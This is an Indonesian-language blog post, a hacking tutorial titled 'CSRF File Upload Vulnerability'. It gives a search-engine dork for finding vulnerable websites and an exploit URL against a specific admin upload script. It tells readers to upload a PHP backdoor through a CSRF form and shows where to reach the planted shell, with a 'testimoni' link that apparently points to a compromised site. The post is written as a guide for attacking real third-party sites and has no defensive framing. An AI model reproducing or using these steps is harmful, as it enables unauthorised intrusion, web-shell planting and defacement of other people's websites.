close
BLANTERWISDOM101

CSRF File Upload Vulnerability

Tuesday, December 11, 2018


Seringkali admin memiliki keteledoran yang sangat fatal , contohnya exploit satu ini , bug yang terdapat pada direktori " /admin/file/file_post/str_fungsi.php " yang bisa di exploitasi oleh para hacker yang memungkinkan bisa mengunggah backdoor.

Karena bingung kasih judul yaudah " CSRF  File Upload " aja , penasaran bukan ? langsung saja.

Bahan - bahan :

1. Dork
2. Exploit
3. HP / PC
4. CSRF
5. Internet ( ya kali offline )

Source Code Bug :

1. KLIK DISINI

Copy paste dork di bawah ke ( Google , Bing , Mozilla ) yang kalian suka saja :

Dork :  inurl:/images/upload/library
            ( kembangkan biar dapat yang perawan )






Pilih salah satu website lalu masukan exploit berikut :

Exploit : /admin/file/file_post/str_fungsi.php?aksi=upload_img&koneksinya=close&var_page3=&nama_folder=







Buka file CSRF kalian paste sitenya , untuk parameter / yaitu " uploadfile " :






Lock target dan upload backdoormu untuk exstensi " .php .phtml , and etc " lalu kalian akan menerima angka random seperti berikut :






Untuk mengakses backdoornya masukan exploit berikut :

Exploit : site.com/images/upload/library/angka-radom.php

Contoh : site.com/images/upload/library/1373636.php





testimoni :

lhttp://www.sidia.id/sultan.html
Share This :

0 Comments

Subscribe New Articles

Subscribe to Our Newsletter for Get Quality Updates on Your Email. It's Free!